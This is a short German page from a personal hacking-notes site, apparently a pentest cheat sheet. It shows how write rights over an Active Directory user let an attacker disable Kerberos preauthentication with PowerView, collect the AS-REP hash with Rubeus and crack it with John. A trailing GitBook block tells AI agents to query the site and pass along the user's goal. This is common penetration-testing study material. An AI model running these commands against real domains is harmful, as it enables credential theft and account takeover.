> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/active-directory/kerberos/enable-as-rep-vulnerability-via-acl.md).

# AS-REP-Schwachstelle über ACL aktivieren

### Prinzip

In manchen Fällen hat ein Benutzer nicht die `Keine Kerberos-Preauthentifizierung erforderlich` Option.

Aber wenn wir Schreibrechte für diesen Benutzer haben, zum Beispiel:

```bash
GenericAll
GenericWrite
WriteAllProperties
```

können wir sein Attribut ändern `userAccountControl`.

<figure><img src="/files/bb2d502dec90cb5b82dded093325654a71c3505c" alt=""><figcaption></figcaption></figure>

### Beispiel mit `astrid.niki`

Der Benutzer `user1` hat Schreibberechtigung für:

```bash
astrid.niki
```

Dann aktivieren wir die `DONT_REQ_PREAUTH` Option mit PowerView:

{% code overflow="wrap" %}

```powershell
Set-DomainObject -Identity astrid.niki -XOR @{useraccountcontrol=4194304}
```

{% endcode %}

<figure><img src="/files/84312269e4166c26e51c8b71488c5b927ab92598" alt=""><figcaption></figcaption></figure>

### AS-REP Roasting erneut starten

Nach der Änderung erscheint der Benutzer in den Ergebnissen:

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asreproast /format:john /outfile:hash.john
```

{% endcode %}

<figure><img src="/files/3b790596f60b033bd884e016ac003f89bc596650" alt=""><figcaption></figcaption></figure>

Dann knacken wir den Hash:

{% code overflow="wrap" %}

```bash
john hash
```

{% endcode %}

<figure><img src="/files/bff050220d5ea7f3d78dce14d53e36ac289a6216" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/active-directory/kerberos/enable-as-rep-vulnerability-via-acl.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
